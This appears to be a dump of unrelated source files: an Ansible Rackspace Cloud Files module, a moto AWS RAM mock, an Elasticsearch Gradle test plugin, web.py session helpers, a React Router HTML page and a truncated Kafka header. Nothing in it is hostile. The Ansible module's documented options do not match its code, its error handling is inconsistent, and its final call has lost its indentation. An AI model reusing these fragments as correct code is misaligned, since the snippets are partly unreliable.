dashboard.Project.register(LoadBalancer)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# (c) 2013, Paul Durivage <paul.durivage@rackspace.com>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: rax_files
short_description: Manipulate Rackspace Cloud Files Containers
description:
- Manipulate Rackspace Cloud Files Containers
version_added: "1.5"
options:
clear_meta:
description:
- Optionally clear existing metadata when applying metadata to existing containers.
Selecting this option is only appropriate when setting type=meta
choices:
- "yes"
- "no"
default: "no"
container:
description:
- The container to use for container or metadata operations.
required: true
meta:
description:
- A hash of items to set as metadata values on a container
private:
description:
- Used to set a container as private, removing it from the CDN. B(Warning!)
Private containers, if previously made public, can have live objects
available until the TTL on cached objects expires
public:
description:
- Used to set a container as public, available via the Cloud Files CDN
region:
description:
- Region to create an instance in
default: DFW
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
ttl:
description:
- In seconds, set a container-wide TTL for all objects cached on CDN edge nodes.
Setting a TTL is only appropriate for containers that are public
type:
description:
- Type of object to do work on, i.e. metadata object or a container object
choices:
- file
- meta
default: file
web_error:
description:
- Sets an object to be presented as the HTTP error page when accessed by the CDN URL
web_index:
description:
- Sets an object to be presented as the HTTP index page when accessed by the CDN URL
author: "Paul Durivage (@angstwad)"
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: "Test Cloud Files Containers"
hosts: local
gather_facts: no
tasks:
- name: "List all containers"
rax_files:
state: list
- name: "Create container called 'mycontainer'"
rax_files:
container: mycontainer
- name: "Create container 'mycontainer2' with metadata"
rax_files:
container: mycontainer2
meta:
key: value
file_for: someuser@example.com
- name: "Set a container's web index page"
rax_files:
container: mycontainer
web_index: index.html
- name: "Set a container's web error page"
rax_files:
container: mycontainer
web_error: error.html
- name: "Make container public"
rax_files:
container: mycontainer
public: yes
- name: "Make container public with a 24 hour TTL"
rax_files:
container: mycontainer
public: yes
ttl: 86400
- name: "Make container private"
rax_files:
container: mycontainer
private: yes
- name: "Test Cloud Files Containers Metadata Storage"
hosts: local
gather_facts: no
tasks:
- name: "Get mycontainer2 metadata"
rax_files:
container: mycontainer2
type: meta
- name: "Set mycontainer2 metadata"
rax_files:
container: mycontainer2
type: meta
meta:
uploaded_by: someuser@example.com
- name: "Remove mycontainer2 metadata"
rax_files:
container: "mycontainer2"
type: meta
state: absent
meta:
key: ""
file_for: ""
'''
# pyrax is the Rackspace Cloud SDK; the import is optional so main() can emit
# a clean failure message instead of an ImportError traceback.
try:
    import pyrax
    HAS_PYRAX = True
except ImportError as e:
    HAS_PYRAX = False
# Shared payload returned through module.exit_json(); mutated by the helpers.
EXIT_DICT = dict(success=True)
# Cloud Files stores container metadata under headers with this prefix.
META_PREFIX = 'x-container-meta-'
def _get_container(module, cf, container):
    """Return the Cloud Files container object, failing the module if absent.

    module: AnsibleModule used for error reporting.
    cf: pyrax cloudfiles client.
    container: container name to look up.
    """
    try:
        return cf.get_container(container)
    except pyrax.exc.NoSuchContainer as e:
        # str(e) instead of e.message: BaseException.message was removed in
        # Python 3 (deprecated since 2.6), so e.message raised AttributeError.
        module.fail_json(msg=str(e))
def _fetch_meta(module, container):
    """Populate EXIT_DICT['meta'] with the container's current metadata.

    Cloud Files returns metadata keys prefixed with META_PREFIX; the prefix
    is stripped so users see the bare key names they set.
    """
    EXIT_DICT['meta'] = dict()
    try:
        for k, v in container.get_metadata().items():
            # Strip the 'x-container-meta-' prefix from the raw header name.
            split_key = k.split(META_PREFIX)[-1]
            EXIT_DICT['meta'][split_key] = v
    except Exception as e:
        # str(e): BaseException.message does not exist on Python 3.
        module.fail_json(msg=str(e))
def meta(cf, module, container_, state, meta_, clear_meta):
    """Set, remove, or report container metadata, then exit the module.

    state == 'present' with meta_ sets the given keys; state == 'absent'
    removes the given keys (or every key when meta_ is empty).  Never
    returns normally: finishes via module.exit_json()/fail_json().
    """
    c = _get_container(module, cf, container_)
    # Explicit flag replaces the old "name in locals()" changed-detection,
    # which was fragile and opaque; reported behavior is identical.
    changed = False
    if meta_ and state == 'present':
        try:
            c.set_metadata(meta_, clear=clear_meta)
            changed = True
        except Exception as e:
            # str(e): BaseException.message does not exist on Python 3.
            module.fail_json(msg=str(e))
    elif meta_ and state == 'absent':
        remove_results = []
        for k, v in meta_.items():
            c.remove_metadata_key(k)
            remove_results.append(k)
        EXIT_DICT['deleted_meta_keys'] = remove_results
        changed = True
    elif state == 'absent':
        # No specific keys given: clear all metadata currently on the container.
        remove_results = []
        for k, v in c.get_metadata().items():
            c.remove_metadata_key(k)
            remove_results.append(k)
        EXIT_DICT['deleted_meta_keys'] = remove_results
        changed = True
    _fetch_meta(module, c)
    EXIT_DICT['container'] = c.name
    if changed:
        EXIT_DICT['changed'] = True
    module.exit_json(**EXIT_DICT)
def container(cf, module, container_, state, meta_, clear_meta, ttl, public,
              private, web_index, web_error):
    """Create, delete, list or configure a Cloud Files container, then exit.

    Never returns normally: finishes via module.exit_json()/fail_json().
    EXIT_DICT accumulates the result payload reported back to Ansible.
    """
    if public and private:
        module.fail_json(msg='container cannot be simultaneously '
                             'set to public and private')
    # Attribute changes are meaningless on a container being deleted.
    # NOTE(review): the message wording ("state cannot be omitted") looks off
    # for this check, which rejects attributes combined with state=absent —
    # confirm the intended text.
    if state == 'absent' and (meta_ or clear_meta or public or private or web_index or web_error):
        module.fail_json(msg='state cannot be omitted when setting/removing '
                             'attributes on a container')
    if state == 'list':
        # We don't care if attributes are specified, let's list containers
        EXIT_DICT['containers'] = cf.list_containers()
        module.exit_json(**EXIT_DICT)
    try:
        c = cf.get_container(container_)
    except pyrax.exc.NoSuchContainer as e:
        # Make the container if state=present, otherwise bomb out
        if state == 'present':
            try:
                c = cf.create_container(container_)
            except Exception as e:
                module.fail_json(msg=e.message)
            else:
                EXIT_DICT['changed'] = True
                EXIT_DICT['created'] = True
        else:
            module.fail_json(msg=e.message)
    else:
        # Successfully grabbed a container object
        # Delete if state is absent
        if state == 'absent':
            try:
                cont_deleted = c.delete()
            except Exception as e:
                module.fail_json(msg=e.message)
            else:
                EXIT_DICT['deleted'] = True
    if meta_:
        try:
            meta_set = c.set_metadata(meta_, clear=clear_meta)
        except Exception as e:
            module.fail_json(msg=e.message)
        finally:
            # Always report the metadata actually on the container.
            _fetch_meta(module, c)
    if ttl:
        try:
            c.cdn_ttl = ttl
        except Exception as e:
            module.fail_json(msg=e.message)
        else:
            EXIT_DICT['ttl'] = c.cdn_ttl
    if public:
        try:
            cont_public = c.make_public()
        except Exception as e:
            module.fail_json(msg=e.message)
        else:
            # Expose every CDN endpoint variant for the now-public container.
            EXIT_DICT['container_urls'] = dict(url=c.cdn_uri,
                                               ssl_url=c.cdn_ssl_uri,
                                               streaming_url=c.cdn_streaming_uri,
                                               ios_uri=c.cdn_ios_uri)
    if private:
        try:
            cont_private = c.make_private()
        except Exception as e:
            module.fail_json(msg=e.message)
        else:
            EXIT_DICT['set_private'] = True
    if web_index:
        try:
            cont_web_index = c.set_web_index_page(web_index)
        except Exception as e:
            module.fail_json(msg=e.message)
        else:
            EXIT_DICT['set_index'] = True
        finally:
            _fetch_meta(module, c)
    if web_error:
        try:
            cont_err_index = c.set_web_error_page(web_error)
        except Exception as e:
            module.fail_json(msg=e.message)
        else:
            EXIT_DICT['set_error'] = True
        finally:
            _fetch_meta(module, c)
    EXIT_DICT['container'] = c.name
    EXIT_DICT['objs_in_container'] = c.object_count
    EXIT_DICT['total_bytes'] = c.total_bytes
    # Each cont_*/meta_set local only exists when its operation succeeded, so
    # presence in locals() doubles as the "changed" flag.
    _locals = locals().keys()
    if ('cont_deleted' in _locals
            or 'meta_set' in _locals
            or 'cont_public' in _locals
            or 'cont_private' in _locals
            or 'cont_web_index' in _locals
            or 'cont_err_index' in _locals):
        EXIT_DICT['changed'] = True
    module.exit_json(**EXIT_DICT)
def cloudfiles(module, container_, state, meta_, clear_meta, typ, ttl, public,
               private, web_index, web_error):
    """Dispatch to container-level or metadata-level handling."""
    cf = pyrax.cloudfiles
    # A None client means authentication succeeded but the region was wrong
    # (or wrongly capitalized), so no cloudfiles endpoint was found.
    if cf is None:
        module.fail_json(msg='Failed to instantiate client. This '
                             'typically indicates an invalid region or an '
                             'incorrectly capitalized region name.')
    if typ != "container":
        meta(cf, module, container_, state, meta_, clear_meta)
    else:
        container(cf, module, container_, state, meta_, clear_meta, ttl,
                  public, private, web_index, web_error)
def main():
    """Ansible module entry point: parse arguments and dispatch to Cloud Files."""
    argument_spec = rax_argument_spec()
    argument_spec.update(
        dict(
            container=dict(),
            state=dict(choices=['present', 'absent', 'list'],
                       default='present'),
            meta=dict(type='dict', default=dict()),
            clear_meta=dict(default=False, type='bool'),
            type=dict(choices=['container', 'meta'], default='container'),
            ttl=dict(type='int'),
            public=dict(default=False, type='bool'),
            private=dict(default=False, type='bool'),
            web_index=dict(),
            web_error=dict()
        )
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=rax_required_together()
    )
    # The pyrax import at module top is optional; fail cleanly here instead.
    if not HAS_PYRAX:
        module.fail_json(msg='pyrax is required for this module')
    container_ = module.params.get('container')
    state = module.params.get('state')
    meta_ = module.params.get('meta')
    clear_meta = module.params.get('clear_meta')
    typ = module.params.get('type')
    ttl = module.params.get('ttl')
    public = module.params.get('public')
    private = module.params.get('private')
    web_index = module.params.get('web_index')
    web_error = module.params.get('web_error')
    # 'list' is the only state that works without a container name.
    if state in ['present', 'absent'] and not container_:
        module.fail_json(msg='please specify a container name')
    # clear_meta only makes sense for metadata operations (type=meta).
    if clear_meta and not typ == 'meta':
        module.fail_json(msg='clear_meta can only be used when setting '
                             'metadata')
    setup_rax_module(module, pyrax)
    cloudfiles(module, container_, state, meta_, clear_meta, typ, ttl, public,
               private, web_index, web_error)
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
if __name__ == '__main__':
main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
DOCUMENTATION:
name: config
|
unknown
|
github
|
https://github.com/ansible/ansible
|
lib/ansible/_internal/ansible_collections/ansible/_protomatter/plugins/lookup/config.yml
|
import re
import string
from datetime import datetime
import random
from uuid import uuid4
from boto3 import Session
from moto.core import BaseBackend, BaseModel, ACCOUNT_ID
from moto.core.utils import unix_time
from moto.organizations import organizations_backends
from moto.ram.exceptions import (
MalformedArnException,
InvalidParameterException,
UnknownResourceException,
OperationNotPermittedException,
)
def random_resource_id(size):
    """Return *size* random lowercase-hex characters (0-9, a-f)."""
    # Build the alphabet once instead of per character.
    hex_chars = string.digits + "abcdef"
    return "".join([random.choice(hex_chars) for _ in range(size)])
class ResourceShare(BaseModel):
    """In-memory model of a single AWS RAM resource share."""

    # List of shareable resources can be found here
    # https://docs.aws.amazon.com/ram/latest/userguide/shareable.html
    SHAREABLE_RESOURCES = [
        "cluster",  # Amazon Aurora cluster
        "component",  # Amazon EC2 Image Builder component
        "group",  # AWS Resource Groups
        "image",  # Amazon EC2 Image Builder image
        "image-recipe",  # Amazon EC2 Image Builder image recipe
        "license-configuration",  # AWS License Manager configuration
        "mesh",  # AWS App Mesh
        "prefix-list",  # Amazon EC2 prefix list
        "project",  # AWS CodeBuild project
        "report-group",  # AWS CodeBuild report group
        "resolver-rule",  # Amazon Route 53 forwarding rule
        "subnet",  # Amazon EC2 subnet
        "transit-gateway",  # Amazon EC2 transit gateway
    ]

    def __init__(self, region, **kwargs):
        """Create a share in *region*; kwargs must contain 'name' and may
        contain 'allowExternalPrincipals' (defaults to True)."""
        self.region = region
        self.allow_external_principals = kwargs.get("allowExternalPrincipals", True)
        self.arn = "arn:aws:ram:{0}:{1}:resource-share/{2}".format(
            self.region, ACCOUNT_ID, uuid4()
        )
        self.creation_time = datetime.utcnow()
        self.feature_set = "STANDARD"
        self.last_updated_time = datetime.utcnow()
        self.name = kwargs["name"]
        self.owning_account_id = ACCOUNT_ID
        self.principals = []
        self.resource_arns = []
        self.status = "ACTIVE"

    @property
    def organizations_backend(self):
        # moto keeps a single global Organizations backend.
        return organizations_backends["global"]

    def add_principals(self, principals):
        """Validate then record share principals.

        Accepted forms: an organization ARN (must match this account's
        organization), an organizational-unit ARN (must exist under the
        root), or a bare 12-digit account id.  Validation runs over ALL
        principals before any are appended, so a bad entry leaves the
        share unchanged.
        """
        for principal in principals:
            match = re.search(
                r"^arn:aws:organizations::\d{12}:organization/(o-\w+)$", principal
            )
            if match:
                organization = self.organizations_backend.describe_organization()
                if principal == organization["Organization"]["Arn"]:
                    continue
                else:
                    raise UnknownResourceException(
                        "Organization {} could not be found.".format(match.group(1))
                    )
            match = re.search(
                r"^arn:aws:organizations::\d{12}:ou/(o-\w+)/(ou-[\w-]+)$", principal
            )
            if match:
                roots = self.organizations_backend.list_roots()
                root_id = next(
                    (
                        root["Id"]
                        for root in roots["Roots"]
                        if root["Name"] == "Root" and match.group(1) in root["Arn"]
                    ),
                    None,
                )
                if root_id:
                    ous = self.organizations_backend.list_organizational_units_for_parent(
                        ParentId=root_id
                    )
                    if any(principal == ou["Arn"] for ou in ous["OrganizationalUnits"]):
                        continue
                raise UnknownResourceException(
                    "OrganizationalUnit {} in unknown organization could not be found.".format(
                        match.group(2)
                    )
                )
            # Neither ARN form matched: only a plain 12-digit account id is left.
            if not re.match(r"^\d{12}$", principal):
                raise InvalidParameterException(
                    "Principal ID {} is malformed. "
                    "Verify the ID and try again.".format(principal)
                )
        for principal in principals:
            self.principals.append(principal)

    def add_resources(self, resource_arns):
        """Validate then record shared resource ARNs.

        Each ARN must parse and its resource type must be in
        SHAREABLE_RESOURCES.  Like add_principals, validation completes
        over all ARNs before any are appended.
        """
        for resource in resource_arns:
            match = re.search(
                r"^arn:aws:[a-z0-9-]+:[a-z0-9-]*:[0-9]{12}:([a-z-]+)[/:].*$", resource
            )
            if not match:
                raise MalformedArnException(
                    "The specified resource ARN {} is not valid. "
                    "Verify the ARN and try again.".format(resource)
                )
            if match.group(1) not in self.SHAREABLE_RESOURCES:
                raise MalformedArnException(
                    "You cannot share the selected resource type."
                )
        for resource in resource_arns:
            self.resource_arns.append(resource)

    def delete(self):
        """Soft-delete: flip the status; the object is kept for listing."""
        self.last_updated_time = datetime.utcnow()
        self.status = "DELETED"

    def describe(self):
        """Return the API-shaped description dict for this share."""
        return {
            "allowExternalPrincipals": self.allow_external_principals,
            "creationTime": unix_time(self.creation_time),
            "featureSet": self.feature_set,
            "lastUpdatedTime": unix_time(self.last_updated_time),
            "name": self.name,
            "owningAccountId": self.owning_account_id,
            "resourceShareArn": self.arn,
            "status": self.status,
        }

    def update(self, **kwargs):
        """Update mutable fields (allowExternalPrincipals, name) in place."""
        self.allow_external_principals = kwargs.get(
            "allowExternalPrincipals", self.allow_external_principals
        )
        self.last_updated_time = datetime.utcnow()
        self.name = kwargs.get("name", self.name)
class ResourceAccessManagerBackend(BaseBackend):
    """In-memory backend mimicking the AWS Resource Access Manager API."""

    def __init__(self, region_name=None):
        super(ResourceAccessManagerBackend, self).__init__()
        self.region_name = region_name
        self.resource_shares = []

    @property
    def organizations_backend(self):
        # RAM integrates with Organizations; moto keeps one global backend.
        return organizations_backends["global"]

    def reset(self):
        """Re-initialize the backend, preserving its region."""
        region_name = self.region_name
        self.__dict__ = {}
        self.__init__(region_name)

    def _get_resource_share(self, arn):
        """Return the share with *arn* or raise UnknownResourceException.

        Extracted helper: the lookup-or-fail pattern was duplicated in
        update_resource_share and delete_resource_share.
        """
        resource = next(
            (resource for resource in self.resource_shares if arn == resource.arn),
            None,
        )
        if not resource:
            raise UnknownResourceException(
                "ResourceShare {} could not be found.".format(arn)
            )
        return resource

    def create_resource_share(self, **kwargs):
        """Create a share, validating principals and resource ARNs."""
        resource = ResourceShare(self.region_name, **kwargs)
        resource.add_principals(kwargs.get("principals", []))
        resource.add_resources(kwargs.get("resourceArns", []))
        self.resource_shares.append(resource)
        response = resource.describe()
        # The create API response does not include the feature set.
        response.pop("featureSet")
        return dict(resourceShare=response)

    def get_resource_shares(self, **kwargs):
        """List shares owned by this account (resourceOwner must be SELF)."""
        owner = kwargs["resourceOwner"]
        if owner not in ["SELF", "OTHER-ACCOUNTS"]:
            raise InvalidParameterException(
                "{} is not a valid resource owner. "
                "Specify either SELF or OTHER-ACCOUNTS and try again.".format(owner)
            )
        if owner == "OTHER-ACCOUNTS":
            raise NotImplementedError(
                "Value 'OTHER-ACCOUNTS' for parameter 'resourceOwner' not implemented."
            )
        # Typo fix: local variable was previously spelled "resouces".
        resources = [resource.describe() for resource in self.resource_shares]
        return dict(resourceShares=resources)

    def update_resource_share(self, **kwargs):
        """Update an existing share identified by resourceShareArn."""
        resource = self._get_resource_share(kwargs["resourceShareArn"])
        resource.update(**kwargs)
        response = resource.describe()
        response.pop("featureSet")
        return dict(resourceShare=response)

    def delete_resource_share(self, arn):
        """Soft-delete the share with the given ARN."""
        self._get_resource_share(arn).delete()
        return dict(returnValue=True)

    def enable_sharing_with_aws_organization(self):
        """Only permitted when an AWS Organization actually exists."""
        if not self.organizations_backend.org:
            raise OperationNotPermittedException
        return dict(returnValue=True)
# Pre-create one backend per region across the standard, GovCloud and China
# partitions; boto3's Session is used only to enumerate region names.
ram_backends = {}
for region in Session().get_available_regions("ram"):
    ram_backends[region] = ResourceAccessManagerBackend(region)
for region in Session().get_available_regions("ram", partition_name="aws-us-gov"):
    ram_backends[region] = ResourceAccessManagerBackend(region)
for region in Session().get_available_regions("ram", partition_name="aws-cn"):
    ram_backends[region] = ResourceAccessManagerBackend(region)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the "Elastic License
* 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
* Public License v 1"; you may not use this file except in compliance with, at
* your election, the "Elastic License 2.0", the "GNU Affero General Public
* License v3.0 only", or the "Server Side Public License, v 1".
*/
package org.elasticsearch.gradle.internal.test;
import org.elasticsearch.gradle.internal.ElasticsearchJavaBasePlugin;
import org.elasticsearch.gradle.internal.ElasticsearchTestBasePlugin;
import org.elasticsearch.gradle.internal.FixtureStop;
import org.elasticsearch.gradle.internal.InternalTestClustersPlugin;
import org.elasticsearch.gradle.internal.RestrictedBuildApiService;
import org.elasticsearch.gradle.internal.precommit.InternalPrecommitTasks;
import org.elasticsearch.gradle.test.SystemPropertyCommandLineArgumentProvider;
import org.elasticsearch.gradle.testclusters.ElasticsearchCluster;
import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask;
import org.elasticsearch.gradle.testclusters.TestClustersPlugin;
import org.elasticsearch.gradle.util.GradleUtils;
import org.gradle.api.NamedDomainObjectContainer;
import org.gradle.api.Plugin;
import org.gradle.api.Project;
import org.gradle.api.Task;
import org.gradle.api.plugins.JavaBasePlugin;
import org.gradle.api.provider.Provider;
import org.gradle.api.provider.ProviderFactory;
import org.gradle.api.specs.NotSpec;
import org.gradle.api.specs.Spec;
import org.gradle.api.tasks.Sync;
import org.gradle.api.tasks.bundling.Zip;
import javax.inject.Inject;
import static org.elasticsearch.gradle.internal.RestrictedBuildApiService.BUILD_API_RESTRICTIONS_SYS_PROPERTY;
import static org.elasticsearch.gradle.plugin.BasePluginBuildPlugin.BUNDLE_PLUGIN_TASK_NAME;
import static org.elasticsearch.gradle.plugin.BasePluginBuildPlugin.EXPLODED_BUNDLE_PLUGIN_TASK_NAME;
/**
 * Legacy Gradle plugin wiring REST integration tests to test clusters:
 * registers one {@link ElasticsearchCluster} per {@link RestIntegTestTask},
 * forwards cluster endpoints via system properties, and disables build-cache
 * entries for tasks that share a cluster.
 *
 * @deprecated use {@link RestTestBasePlugin} instead
 */
@Deprecated
public class LegacyRestTestBasePlugin implements Plugin<Project> {
    // System properties consumed by the test JVM; either all of the first
    // three are user-supplied (external cluster) or none are (managed cluster).
    private static final String TESTS_REST_CLUSTER = "tests.rest.cluster";
    private static final String TESTS_CLUSTER = "tests.cluster";
    private static final String TESTS_CLUSTER_NAME = "tests.clustername";
    private static final String TESTS_CLUSTER_READINESS = "tests.cluster.readiness";
    private static final String TESTS_CLUSTER_REMOTE_ACCESS = "tests.cluster.remote_access";
    private ProviderFactory providerFactory;
    private Project project;
    @Inject
    public LegacyRestTestBasePlugin(ProviderFactory providerFactory) {
        this.providerFactory = providerFactory;
    }
    @Override
    public void apply(Project project) {
        this.project = project;
        // Shared build service that flags (or, when disabled, permits) use of
        // this restricted legacy plugin by the current project.
        Provider<RestrictedBuildApiService> serviceProvider = project.getGradle()
            .getSharedServices()
            .registerIfAbsent("restrictedBuildAPI", RestrictedBuildApiService.class, spec -> {
                spec.getParameters().getDisabled().set(Boolean.getBoolean(BUILD_API_RESTRICTIONS_SYS_PROPERTY));
            });
        serviceProvider.get().failOnUsageRestriction(getClass(), project);
        project.getPluginManager().apply(ElasticsearchJavaBasePlugin.class);
        project.getPluginManager().apply(ElasticsearchTestBasePlugin.class);
        project.getPluginManager().apply(InternalTestClustersPlugin.class);
        InternalPrecommitTasks.create(project, false);
        project.getTasks().withType(RestIntegTestTask.class).configureEach(restIntegTestTask -> {
            @SuppressWarnings("unchecked")
            NamedDomainObjectContainer<ElasticsearchCluster> testClusters = (NamedDomainObjectContainer<ElasticsearchCluster>) project
                .getExtensions()
                .getByName(TestClustersPlugin.EXTENSION_NAME);
            // One managed cluster per REST test task, keyed by task name.
            ElasticsearchCluster cluster = testClusters.maybeCreate(restIntegTestTask.getName());
            restIntegTestTask.useCluster(cluster);
            restIntegTestTask.include("**/*IT.class");
            restIntegTestTask.systemProperty("tests.rest.load_packaged", Boolean.FALSE.toString());
            if (systemProperty(TESTS_REST_CLUSTER) == null) {
                // Managed-cluster mode: none of the cluster properties may be
                // set by the user; endpoints are wired in lazily as
                // non-input properties so they don't break up-to-date checks.
                if (systemProperty(TESTS_CLUSTER) != null || systemProperty(TESTS_CLUSTER_NAME) != null) {
                    throw new IllegalArgumentException(
                        String.format("%s, %s, and %s must all be null or non-null", TESTS_REST_CLUSTER, TESTS_CLUSTER, TESTS_CLUSTER_NAME)
                    );
                }
                SystemPropertyCommandLineArgumentProvider runnerNonInputProperties =
                    (SystemPropertyCommandLineArgumentProvider) restIntegTestTask.getExtensions().getByName("nonInputProperties");
                runnerNonInputProperties.systemProperty(TESTS_REST_CLUSTER, () -> String.join(",", cluster.getAllHttpSocketURI()));
                runnerNonInputProperties.systemProperty(TESTS_CLUSTER, () -> String.join(",", cluster.getAllTransportPortURI()));
                runnerNonInputProperties.systemProperty(TESTS_CLUSTER_NAME, cluster::getName);
                runnerNonInputProperties.systemProperty(TESTS_CLUSTER_READINESS, () -> String.join(",", cluster.getAllReadinessPortURI()));
                runnerNonInputProperties.systemProperty(
                    TESTS_CLUSTER_REMOTE_ACCESS,
                    () -> String.join(",", cluster.getAllRemoteAccessPortURI())
                );
            } else {
                // External-cluster mode: all three properties must be supplied.
                if (systemProperty(TESTS_CLUSTER) == null || systemProperty(TESTS_CLUSTER_NAME) == null) {
                    throw new IllegalArgumentException(
                        String.format("%s, %s, and %s must all be null or non-null", TESTS_REST_CLUSTER, TESTS_CLUSTER, TESTS_CLUSTER_NAME)
                    );
                }
            }
        });
        // Run all REST integration tests as part of `check`.
        project.getTasks()
            .named(JavaBasePlugin.CHECK_TASK_NAME)
            .configure(check -> check.dependsOn(project.getTasks().withType(RestIntegTestTask.class)));
        // Always stop external test fixtures after standalone REST tests.
        project.getTasks()
            .withType(StandaloneRestIntegTestTask.class)
            .configureEach(t -> t.finalizedBy(project.getTasks().withType(FixtureStop.class)));
        project.getTasks().withType(StandaloneRestIntegTestTask.class).configureEach(t -> {
            t.setMaxParallelForks(1);
            // if this a module or plugin, it may have an associated zip file with it's contents, add that to the test cluster
            project.getPluginManager().withPlugin("elasticsearch.esplugin", plugin -> {
                if (GradleUtils.isModuleProject(project.getPath())) {
                    var bundle = project.getTasks().withType(Sync.class).named(EXPLODED_BUNDLE_PLUGIN_TASK_NAME);
                    t.getClusters().forEach(c -> c.module(bundle));
                } else {
                    var bundle = project.getTasks().withType(Zip.class).named(BUNDLE_PLUGIN_TASK_NAME);
                    t.getClusters().forEach(c -> c.plugin(bundle));
                }
            });
            configureCacheability(t);
        });
    }
    /** Disable caching and up-to-date checks for tasks using a shared cluster. */
    private void configureCacheability(StandaloneRestIntegTestTask testTask) {
        Spec<Task> taskSpec = task -> testTask.getClusters().stream().anyMatch(ElasticsearchCluster::isShared);
        testTask.getOutputs()
            .doNotCacheIf(
                "Caching disabled for this task since it uses a cluster shared by other tasks",
                /*
                 * Look for any other tasks which use the same cluster as this task. Since tests often have side effects for the cluster
                 * they execute against, this state can cause issues when trying to cache tests results of tasks that share a cluster. To
                 * avoid any undesired behavior we simply disable the cache if we detect that this task uses a cluster shared between
                 * multiple tasks.
                 */
                taskSpec
            );
        testTask.getOutputs().upToDateWhen(new NotSpec(taskSpec));
    }
    /** Read a JVM system property via the provider API; null when unset. */
    private String systemProperty(String propName) {
        return providerFactory.systemProperty(propName).getOrNull();
    }
}
|
java
|
github
|
https://github.com/elastic/elasticsearch
|
build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/LegacyRestTestBasePlugin.java
|
# -*- coding: utf-8 -*-
import base64
import functools

import web

import gecoc.gecolib as gecolib
def authenticated(function):
    """Decorator: redirect to /login unless the session has a username."""
    @functools.wraps(function)
    def new_function(*args, **kwargs):
        # Fetch the session per-request: web.ses may not be configured yet
        # at decoration (import) time, and capturing it there kept a stale
        # reference for the life of the process.
        session = web.ses
        username = session.get('username', '')
        if username:
            return function(*args, **kwargs)
        raise web.seeother('/login')
    return new_function
def error(function):
    """Decorator: flash uncaught exceptions and redirect to /error.

    web.py redirect "exceptions" (web.seeother) are control flow and are
    re-raised untouched.
    """
    @functools.wraps(function)
    def new_function(*args, **kwargs):
        try:
            return function(*args, **kwargs)
        except web.seeother:
            # Redirects are not errors; let them propagate.
            raise
        except Exception as e:  # `except Exception, e` was Python-2-only syntax
            # XML-RPC faults carry their message in faultString; anything
            # else falls back to str(e).
            try:
                flash(e.faultString, 'error')
            except Exception:
                flash(str(e), 'error')
            raise web.seeother('/error')
    return new_function
def templated(css='', js='', title='', menu=[]):
css = css.split(' ') if css else []
js = js.split(' ') if js else []
render = web.template.render('templates')
def new_deco(function):
def new_function(*args, **kwargs):
e = get_err()
m = get_msg()
body = function(*args, **kwargs)
templated = render.master(title=title, css=css,
js=js, body=body, errors=e, msgs=m, menu=menu)
return templated
return new_function
return new_deco
def flash(msg, t='msg'):
    """Queue a flash message in the session.

    msg: a string (or str()-able object), or a list of pre-encoded items.
    t: 'msg' for informational messages, anything else for errors.
    Values are base64-encoded so they survive the session store.
    """
    enc = base64.b64encode
    session = web.ses
    # isinstance replaces the old `type(msg) == type([])` comparison.
    if isinstance(msg, list):
        encoded = [enc(m) for m in msg]
    else:
        encoded = [enc(str(msg))]
    if t == 'msg':
        session.msgs = encoded
    else:
        session.errors = encoded
def get_msg():
    """Pop and base64-decode any queued flash messages from the session."""
    dec = base64.b64decode
    session = web.ses
    # pop() removes the entries so each flash is displayed only once.
    m = session.pop('msgs', '')
    # list(...) keeps the return type a concrete sequence on Python 3,
    # where map() is lazy.
    return list(map(dec, m))
def get_err():
    """Pop and base64-decode any queued flash errors from the session."""
    dec = base64.b64decode
    session = web.ses
    # pop() removes the entries so each flash is displayed only once.
    e = session.pop('errors', '')
    # list(...) keeps the return type a concrete sequence on Python 3,
    # where map() is lazy.
    return list(map(dec, e))
def get_gso(**params):
    """Build a gecolib GSO client from the configured web.SERVER URL.

    The URL scheme selects SSL; the first path component is the host and
    the remainder is the base path on that host.
    """
    server = web.SERVER
    # Default when no scheme is present (previously `ssl` was left unbound,
    # causing a NameError for scheme-less server values).
    ssl = False
    if server.startswith('http://'):
        server = server[len('http://'):]
    elif server.startswith('https://'):
        ssl = True
        server = server[len('https://'):]
    # Split "host/base/path" into host and remaining path.
    base, _sep, path = server.partition('/')
    gso = gecolib.GSO("json", name=server, base=base, path=path, ssl=ssl, **params)
    return gso
|
unknown
|
codeparrot/codeparrot-clean
| ||
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>React Router - SSR Example</title>
</head>
<body>
<div id="app"><!--app-html--></div>
<script type="module" src="/src/entry.client.tsx"></script>
</body>
</html>
|
html
|
github
|
https://github.com/remix-run/react-router
|
examples/ssr/index.html
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.common.record.internal;
import org.apache.kafka.common.errors.CorruptRecordException;
